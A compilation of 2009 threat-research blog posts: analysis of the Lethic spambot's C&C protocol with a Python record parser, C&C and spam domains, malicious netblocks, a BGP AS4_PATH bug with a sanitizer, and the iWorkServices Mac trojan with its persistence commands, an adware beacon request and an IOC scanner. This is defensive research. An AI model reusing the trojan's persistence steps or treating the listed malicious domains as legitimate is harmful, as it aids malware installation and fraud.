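As an added example (not code from the original post), the following Python 3 snippet re-parses the first bot records from the dump above. The framing it assumes is inferred from the dump itself and is not documented in this post: a four-byte record identifier, a one-byte type, and a type-specific body. For type 0x03 the body is a little-endian 16-bit length followed by that many bytes of what looks like an SMTP server response relayed to the C&C (the 0x4C length matches the 76-byte banner); for type 0x01 the six body bytes are read as a four-byte address and a big-endian port, which yields an IP on port 25 for every 0x01 record in the dump; types 0x21 and 0x13 carry one byte and 0x02 and 0x06 none. Header bytes are copied from the hex column; the relayed text is spelled out as the ASCII column shows it.

```python
import struct
from collections import namedtuple

Record = namedtuple("Record", "ident kind body")

# Body sizes per record type, inferred from the dump (not documented):
# 0x01 carries 6 bytes (looks like IPv4 + big-endian port), 0x21 and 0x13
# carry a single byte, 0x02 and 0x06 carry nothing, 0x03 is length-prefixed.
FIXED_BODY = {0x01: 6, 0x21: 1, 0x13: 1, 0x02: 0, 0x06: 0}


def parse_record(data, pos=0):
    """Parse one record at data[pos:]: 4-byte identifier, 1-byte type, then
    a type-specific body. Returns (Record, position after the record)."""
    if len(data) - pos < 5:
        raise ValueError("short record header")
    ident = data[pos:pos + 4]
    kind = data[pos + 4]
    pos += 5
    if kind == 0x03:                      # relayed server text, u16le length
        if len(data) - pos < 2:
            raise ValueError("short length field")
        (n,) = struct.unpack_from("<H", data, pos)
        pos += 2
        if len(data) - pos < n:
            raise ValueError("truncated 0x03 payload")
        return Record(ident, kind, data[pos:pos + n]), pos + n
    if kind not in FIXED_BODY:
        raise ValueError(f"unknown record type 0x{kind:02x}")
    n = FIXED_BODY[kind]
    if len(data) - pos < n:
        raise ValueError("truncated body")
    body = data[pos:pos + n]
    if kind == 0x01:                      # looks like IPv4 address + u16be port
        addr = ".".join(str(b) for b in body[:4])
        (port,) = struct.unpack(">H", body[4:6])
        body = (addr, port)
    return Record(ident, kind, body), pos + n


def parse_stream(data):
    """Parse back-to-back records until the buffer is exhausted."""
    records, pos = [], 0
    while pos < len(data):
        rec, pos = parse_record(data, pos)
        records.append(rec)
    return records


# Constructed sample: the first three bot records from the dump in this post.
SMTP_BANNER = (b"421 4.4.5 Server busy, try again later. "
               b"(mx.google.com) 16si1287203yxe.128\r\n")
SAMPLE = (
    bytes.fromhex("6E330F00 01 D155D254 0019")
    + bytes.fromhex("6E330F00 21 01")
    + bytes.fromhex("6E330F00 03") + struct.pack("<H", len(SMTP_BANNER)) + SMTP_BANNER
)


if __name__ == "__main__":
    for rec in parse_stream(SAMPLE):
        print(rec.ident.hex(), hex(rec.kind), rec.body)
```

The length check on the 0x03 payload is what makes this usable on a live capture rather than a trimmed dump: a banner that runs past the end of the buffer, or a type byte outside the inferred set, raises instead of silently resynchronising on garbage.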

Apparent C&C hostnames and TCP ports used:


For those who want to check their own zoos for samples, here they are by date acquired and their MD5 hash:


And origins by MD5 (all of which had been referenced by downloaders we analyzed):


We have several other EXE URLs on those malcode distribution sites in the past 90 days.

Botnet details and spamming behavior

This graphic shows the relationships of these servers to each-other and their supporting infrastructure, such as their host networks and name servers.


Here’s some of the info about the C&C hostnames, including registrars and ASN info:

-------------[ busnotstop.com
30058 | | FDCSERVERS - FDCservers.net
multi.surbl.org sa-blacklist and other sources
uri.ca2.sophosxl.com Reactively blacklisted
-------------[ goodhearme.cn
30058 | | FDCSERVERS - FDCservers.net
Sponsoring Registrar: 北京新网互联科技有限公司
-------------[ happymanwoman.cn
30058 | | FDCSERVERS - FDCservers.net
Sponsoring Registrar: 北京新网数码信息技术有限公司
-------------[ iamnothere.cn
20473 | | AS-CHOOPA - Choopa, LLC
Sponsoring Registrar: 北京新网互联科技有限公司
-------------[ itsyourservice.cn
30058 | | FDCSERVERS - FDCservers.net
Sponsoring Registrar: 北京新网数码信息技术有限公司
-------------[ linktomem.cn
30058 | | FDCSERVERS - FDCservers.net
Sponsoring Registrar: 北京新网数码信息技术有限公司
-------------[ somethingwrong.cn
30058 | | FDCSERVERS - FDCservers.net
Sponsoring Registrar: 北京新网互联科技有限公司
-------------[ sometimesgood.com
30058 | | FDCSERVERS - FDCservers.net
multi.surbl.org sa-blacklist and other sources
uri.ca2.sophosxl.com Reactively blacklisted
-------------[ tenverybest.com
30058 | | FDCSERVERS - FDCservers.net
multi.surbl.org sa-blacklist and other sources
uri.ca2.sophosxl.com Reactively blacklisted
-------------[ verywellhere.cn
30058 | | FDCSERVERS - FDCservers.net
Sponsoring Registrar: 易名中国
-------------[ wasyoujoy.cn
33642 | | CPCTECHNOLOGIES-LLC - CPC Technologies, LLC.
Sponsoring Registrar: 北京万网志成科技有限公司
-------------[ younotgood.cn
33642 | | CPCTECHNOLOGIES-LLC - CPC Technologies, LLC.
Sponsoring Registrar: 北京新网互联科技有限公司

The minimal blacklist listings were as of yesterday.

When we analyze our spamtrap data, we see 694 distinct spamming zombies for this botnet (based on an observed spam template for “CheapViagra”) in the past day and a half. We know, based on some external measurements, that this is only a small fraction of the botnet. Just four unique subjects in this time that mention “CheapViagra”:

_Buy CheapViagra? $1.05/100mg. Pay 20 Times Less $ Online.. 100%
CheapViagra? Just $1/100mg if Order Online. Cheapest Price - Highest
Order CheapViagra Online,
Spam:Order CheapViagra Online, NoPrescription. Name-BrandViagra.

In at least one of the mails, the link in the message was pointing to wapanyf.cn, which is live and redirects to www.medz-sales.com. Here’s some DNS blacklist data on that from yesterday:

-- Thu Dec 3 21:22:53 2009 GMT
==> Checking wapanyf.cn
multi.surbl.org Blacklisted
uri.ca2.sophosxl.com Reactively blacklisted
dnsbl.mailshell.net Blacklisted
==> Checking wapanyf.cn (
zen.spamhaus.org Direct UBE sources, verified spam services and ROKSO spammers
b.barracudacentral.org Listed

And whois information on that domain:

Domain Name: wapanyf.cn
ROID: 20091106s10001s97618457-cn
Domain Status: clientDeleteProhibited
Domain Status: clientTransferProhibited
Registrant Organization: é˙√ä¿¡ä¿¡
Registrant Name: é˙√ä¿¡ä¿¡
Administrative Email: changshegnjia@126.com
Sponsoring Registrar: æˇ å·ıå¤§ç˝…å∫å…¡ç∏Œç»˛æ˛≈é˙∆å¬å∂¸
Name Server:ns3.knewblock.com
Name Server:ns6.6gl.ru
Name Server:ns4.knewblock.com
Name Server:ns2.painteager.com
Name Server:ns1.painteager.com
Name Server:ns5.6gl.ru
Registration Date: 2009-11-06 23:12
Expiration Date: 2010-11-06 23:12

The final resting place of the pills spam:

-- Thu Dec 3 21:24:03 2009 GMT
==> Checking medz-sales.com
multi.surbl.org sa-blacklist and other sources
==> Checking medz-sales.com (
zen.spamhaus.org Direct UBE sources, verified spam services and ROKSO spammers
b.barracudacentral.org Listed

And whois information on that domain:

Whois Server: whois.namerich.cn
Referral URL: http://www.namerich.cn
Name Server: NS5.JF5.RU
Name Server: NS6.JF5.RU
Status: clientDeleteProhibited
Status: clientTransferProhibited
Updated Date: 03-dec-2009
Creation Date: 18-nov-2009
Expiration Date: 18-nov-2010

Here’s all of the URLs we’ve seen advertised in this “CheapViagra” campaign based on our spamtrap analysis from the past 36 hours:

Lethic bots have also been seen spamming diploma spam, watch spam, and the like. Here’s a few example subject lines from this botnet:

Subject: 0nline Pharmacy, Save on Medications from a safe and reliable canadian 0nline Pharmacy qnq kfi
Subject: Valued customer smeg_69dd@ops-netman.net 80% OFF on Pfizer.
Subject: Valued customer smeg_69d@ops-netman.net 80% OFF on Pfizer.
Subject: Great Popular Soft At Prices You Will Like.
Subject: Need Good Software? Ask Us For Help.
Subject: Extenze Ma1eEnhancement. PenisEn1argement Pills that work! Try it Risk Free.. 100% Guaranteeed uearej t7o
Subject: jRo1exRep1ica Watches & more, browse our collection of perfect rep1icaWatches: jRo1exCartier, Breitling, Omega & many more. ljhlzq 98
Subject: only $200 for SwissRo1ex, Breitling, Chanel, Cartier, Corum, IWC, Hublot, Omega, DeWitt, LouisVuiton, Panerai, Patek Philippe & .. zsyl vzzu
Subject: Get a diploma for a better job.


Lethic is yet another spambot to join the fray. It is unclear what its future holds, and we do not know when it emerged. However, this shows how “full” the “ecosystem” for spambots is. Lethic’s complexity is minimal when compared to other spam botnets (no rootkit seen, etc.), but it appears effective enough at this time.

July 2009 Malicious Links: 14 Hotspots

By: Jose -

Inspired by a friend’s question of which CIDRs to block first, I went looking into our malicious URL database for July 2009 data and dug for the top IPs and netblocks. This was pretty easy: what URLs did the malware we analyze go to, what were the IP addresses associated, and then process that list with “aguri” to discover trends and hot spots. Some of the results are malicious and run by abusers, some are abused networks that are run by otherwise responsible network admins. I’ve tried to describe what we’ve found in each of them, and note that none of them are the next “McColo” or “RBN”, just the loving locations that malware phones home to.

The list below shows the IP or narrow CIDR blocks we found that popped out, together with the contributions (raw number of observations and percentage of overall activity seen for the month).

263 (1.09%): Located in AS3356 (Level 3 Communications). Appears to be related to MSN hosting. Often contacted by what appear to be a lot of games and executables of dubious repute. We get a lot of Trojan horse programs in here; no surprise they piggyback on otherwise healthy networks.

661 (2.73%/2.73%): AS4134, ChinaNet Backbone. Lots of malcode hosted here that we see, and the network is a victim of its own success. Downloaders, infostealers, etc. Been seeing a lot of downloaders phoning back here that install dozens (!) of pieces of malware in one shot, all hosted on the same host.

311 (1.28%): AS13678, Peer 1 Network. A lot of search hijack and toolbars associated with this IP. A lot of “hxxp://” in our database where we see stuff like this posted:

POST /tba/p HTTP/1.1
Content-Length: 269
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;; Windows NT 5.1)
Accept-Encoding: gzip
Host: ads.netbios-local.com
guid=2923514082588C8C84CB8C4B77FE87C3334E&version=86442206692A&clientid=696CD7897DEF73884430&time=AE5E7DD0AE33F9&idle=925089&locale=F94122913C22&session=B10B&activeWindows=E17B02&ticksBoot=AB363FD944633BEE&ticksAlive=336CA641989A53&installTime=0F0C26&launchCount=9E3962

647 (2.67%): AS6939, Hurricane Electric. Lots of Swizzor-related activity.

400 (1.65%): AS3356, Level 3. Lots of FakeAV associated with this IP, such as this sample.

247 (1.02%): AS23393, ISPrime. Seems to be associated with “Fake Alert” or “Renos” based on some Google searches and VTotal results for some samples.

281 (1.16%/1.16%): Associated with Cutwail botnet activity, porn, and even Koobface activity. Spread over a few providers, but lumped into this /14.

293 (1.21%): Coincident with above, hosted in AS16265 LEASEWEB. Fake Alerts and such …

244 (1.01%/1.01%) and 438 (1.81%/1.81%): Associated with AS4134, ChinaNet Backbone. Lots of malware in this space from random individuals.

328 (1.35%/2.41%): AS12695, Digital Network JSC. Lots of malware in the Alureon family associated with URLs in this small netblock.

273 (1.13%): AS3356, Level 3. Looks similar to what we’re seeing on the IP above.

286 (1.18%): AS20228, Pacnet, S.A. de C.V. Lots of random malware; appears to be a free hosting provider in South America that kids are abusing.

305 (1.26%): AS7796, ATMLink. More Renos and Fake Alert stuff associated with the malware we’re analyzing phoning back here.

251 (1.04%/1.04%): AS4766, Korea Telecom. Lots of KwSearchGuide Adware associated with this netblock. Lots of EXEs, DLLs, and PHP scripts called here.

Things in 3FN

By: Jose -

I think by this time folks know about the FTC action against 3FN (Triple Fiber Network). Here’s some of the stuff we had tracked there over the years.


Don’t expect spam to drop to record lows any time soon, but … well done by the FTC.

More AS4_PATH Triggered Global Routing Instability

By: Danny McPherson -

For those of you not paying attention, a slew of new instabilities in the global routing system are occurring – again.  These are presumably being tickled by another ugly AS4_PATH tunnel bug where someone [read: broken implementation] erroneously includes AS_CONFED_* segments in an AS4_PATH attribute – a transitive optional BGP attribute that’s essentially ‘tunneled’ between non-4-octet-AS-number speaking autonomous systems.

[Figure: BGP Routing Instability - Update Frequencies (GMT -5)]

The problem is that when it’s unencapsulated at the receiving end, by a BGP router that could be several networks away, those AS_CONFED_* attributes aren’t supposed to be there, and can result in either a reset of the local session with the adjacent external BGP speaker from which the update was received, or may be propagated to an internal BGP peer, which will likely drop the session with the transmitting speaker — neither of which stop the problem at the source.  The prefix that appears to be causing all the fuss appears to be, a copy of the suspect update [courtesy of ras] available here.  Ras’s email provides some insight into what he’s seeing at the moment, it’s available in the juniper-nsp archive, linked below, and currently unavailable.

The relevant protocol specifications’ error handling procedures were rather vague in this area until recently. There have been a couple of drafts submitted to the IETF Inter-Domain Routing (IDR) WG that attempt to address the specific case outlined above, as well as, more generically, that of optional transitive attributes and error handling. One of the drafts is an update to the original BGP Support for Four-octet AS Number Space specification, RFC 4893, with more explicit guidance and an expanded error handling procedures section. Another draft, Error Handling for Optional Transitive BGP Attributes, attempts to be more prescriptive in general, and addresses a few specific issues in existing specifications as well.
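As an added example (not code from the post, and not any vendor’s implementation), here is the receive-side handling in Python: parse the AS4_PATH segments, then drop any AS_CONFED_* segment and keep processing the update rather than resetting the session with the peer that merely relayed it. Dropping the offending segments is this example’s choice, in the direction the drafts above took, and is an assumption rather than something the post specifies; the ASNs in the sample input are constructed.

```python
import struct

# Path segment types from RFC 4271 and RFC 5065 (confederations).
AS_SET, AS_SEQUENCE, AS_CONFED_SEQUENCE, AS_CONFED_SET = 1, 2, 3, 4
CONFED_TYPES = {AS_CONFED_SEQUENCE, AS_CONFED_SET}

def parse_as4_path(value):
    """Decode an AS4_PATH attribute value (4-octet ASNs) into a list of
    (segment_type, [asn, ...]); raise ValueError if it is malformed."""
    segments, pos = [], 0
    while pos < len(value):
        if pos + 2 > len(value):
            raise ValueError("truncated segment header")
        seg_type, count = value[pos], value[pos + 1]
        pos += 2
        if seg_type not in (AS_SET, AS_SEQUENCE, AS_CONFED_SEQUENCE, AS_CONFED_SET):
            raise ValueError("unknown segment type %d" % seg_type)
        end = pos + 4 * count  # the length octet counts ASNs, not bytes
        if end > len(value):
            raise ValueError("truncated segment body")
        segments.append((seg_type, list(struct.unpack("!%dI" % count, value[pos:end]))))
        pos = end
    return segments

def is_well_formed(value):
    try:
        parse_as4_path(value)
        return True
    except ValueError:
        return False

def sanitize_as4_path(value):
    """Return (kept, dropped): confederation segments that should never have
    been tunnelled in AS4_PATH are dropped and processing continues, instead
    of tearing down the session with the peer that merely relayed them."""
    segments = parse_as4_path(value)
    kept = [s for s in segments if s[0] not in CONFED_TYPES]
    dropped = [s for s in segments if s[0] in CONFED_TYPES]
    return kept, dropped

def encode_segment(seg_type, asns):
    """Build one AS4_PATH segment; used here only to construct sample input."""
    return bytes([seg_type, len(asns)]) + struct.pack("!%dI" % len(asns), *asns)

# Constructed samples: a clean path, and one carrying the erroneous
# AS_CONFED_SEQUENCE described in the post.
CLEAN_AS4_PATH = encode_segment(AS_SEQUENCE, [65536, 3356, 4134])
BAD_AS4_PATH = (encode_segment(AS_CONFED_SEQUENCE, [65001, 65002])
                + encode_segment(AS_SEQUENCE, [65536, 3356]))
```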

Some more information on the original problem from Rob Shakir and others on the IDR mailing list can be found here and in nested references.  I first heard about this specific incident through an email from Richard A Steenbergen ‘ras‘ on the Juniper NSP mailing list, about one hour after the incident began.  Coincidentally, the web interface for the Juniper NSP mailing list seems to be having some reachability problems at the moment that may actually be related to this specific issue.  Some earlier text on the previous incident, as well as a related problem, are available in an earlier post on our blog here.

It is worth noting that the amount of instability resulting from this seems to be significant, but not catastrophic at this point – although that’s likely something that is very topologically dependent, and may very well not be the case for a few less fortunate folk. Finally, this incident is still evolving; it’s been going on for about 4 hours now. Let’s hope it’s squelched soon, and if any noteworthy updates emerge, I’ll be sure to provide them here accordingly.

iWorkServices == P2P iBotnet

By: Jose -

If you want iWork 09 and didn’t want to pay for it, you may have grabbed a pirated copy. That may not have been all you got. If you wanted your Mac to be a part of a P2P botnet, then you’re in luck!

It turns out the package you may have downloaded over BitTorrent, a massive 450MB ZIP installer, is really just a huge Trojan horse package that installs a simple P2P bot tool on your box. Running the installer will not install iLife but instead the official sounding “iWorkServices”. This is not what you think it is. The binary has these characteristics:

MD5 (iWorkServices) = 046af36454af538fa024fbdbaf582a49
SHA1(iWorkServices)= 55d754b95ab9b34bdd848300045c3e11caf67ecf
SHA(iWorkServices)= 6b83df2636a4813ef722f3fad7c65b5419044889
file size: 413568 bytes
iWorkServices: Mach-O universal binary with 2 architectures
iWorkServices (for architecture ppc):   Mach-O executable ppc
iWorkServices (for architecture i386):  Mach-O executable i386

When run as root it creates a couple of files and directories to get set up:


This will now run whenever your box boots. The installer makes sure that the script is runnable:

chmod 755 /System/Library/StartupItems/iWorkServices/iWorkServices

And the script just launches the binary:

/usr/bin/iWorkServices &

Not very sophisticated. On startup it creates a “dot” directory under /tmp:


It fires up some connections:

It will keep on trying until it connects. It also grabs a list of seed P2P peers from the file itself by decrypting the running file (thwarting static analysis) and managing the known peers as you would expect. It generates a port to listen on as needed (although it’s not quite clear to me how it would handle being behind a NAT device).

The bot software itself appears to be a Kademlia-related P2P protocol with the expected commands to manage the peer list, but also to provide a remote shell, download and run arbitrary code, and to give full access to the box:


What’s more is that there is an embedded Lua interpreter, giving a very sophisticated command language some additional structure.

So, what’s this botnet been up to? DDoS it seems, via a downloaded and executed PHP script. Clever.

Looking to find if anyone else is monitoring this botnet …

Bear in mind that this is just like all of the other OS X malware: you have to willingly install it. It’s much more of a Trojan Horse than a virus or worm.
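As an added example (not code from the post, and not Arbor tooling), a defender-side check in Python for the persistence described above: it walks a filesystem tree for a StartupItems entry whose script launches /usr/bin/iWorkServices and compares that binary’s MD5 against the hash quoted in the post. build_constructed_sample() builds a throwaway tree that mimics the layout so the check runs offline; its binary is a placeholder, so the hash is expected not to match.

```python
import hashlib, os, stat, tempfile

# Indicators quoted in the post above; the paths follow its description.
IOC_MD5 = "046af36454af538fa024fbdbaf582a49"
STARTUP_ITEMS = "System/Library/StartupItems"
PAYLOAD = "usr/bin/iWorkServices"

def md5_of(path):
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def scan_root(root):
    """Inspect the tree under <root> ("/" on a live Mac): report StartupItems
    scripts that launch iWorkServices and check the binary's MD5 against the IOC."""
    findings = []
    items_dir = os.path.join(root, STARTUP_ITEMS)
    if os.path.isdir(items_dir):
        for item in sorted(os.listdir(items_dir)):
            script = os.path.join(items_dir, item, item)  # layout: <name>/<name>
            if not os.path.isfile(script):
                continue
            with open(script, "rb") as f:
                body = f.read().decode("utf-8", "replace")
            mode = stat.S_IMODE(os.stat(script).st_mode)
            if "/" + PAYLOAD in body or item == "iWorkServices":
                findings.append("%s: startup script launches /%s (mode %o)" % (script, PAYLOAD, mode))
    payload = os.path.join(root, PAYLOAD)
    if os.path.isfile(payload):
        digest = md5_of(payload)
        verdict = "matches" if digest == IOC_MD5 else "does not match"
        findings.append("%s: present, md5 %s %s the published IOC" % (payload, digest, verdict))
    return findings

def build_constructed_sample():
    """Make a throwaway tree mimicking the post's install (constructed sample;
    the 'binary' is a placeholder, so its MD5 will not match the IOC)."""
    root = tempfile.mkdtemp(prefix="iworkservices-demo-")
    item_dir = os.path.join(root, STARTUP_ITEMS, "iWorkServices")
    os.makedirs(item_dir)
    os.makedirs(os.path.join(root, "usr", "bin"))
    script = os.path.join(item_dir, "iWorkServices")
    with open(script, "w") as f:
        f.write("#!/bin/sh\n/usr/bin/iWorkServices &\n")
    os.chmod(script, 0o755)
    with open(os.path.join(root, PAYLOAD), "wb") as f:
        f.write(b"placeholder, not the real Mach-O binary")
    return root
```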

Related info:

Edited to fix the name of the product this Trojan package masqueraded as.
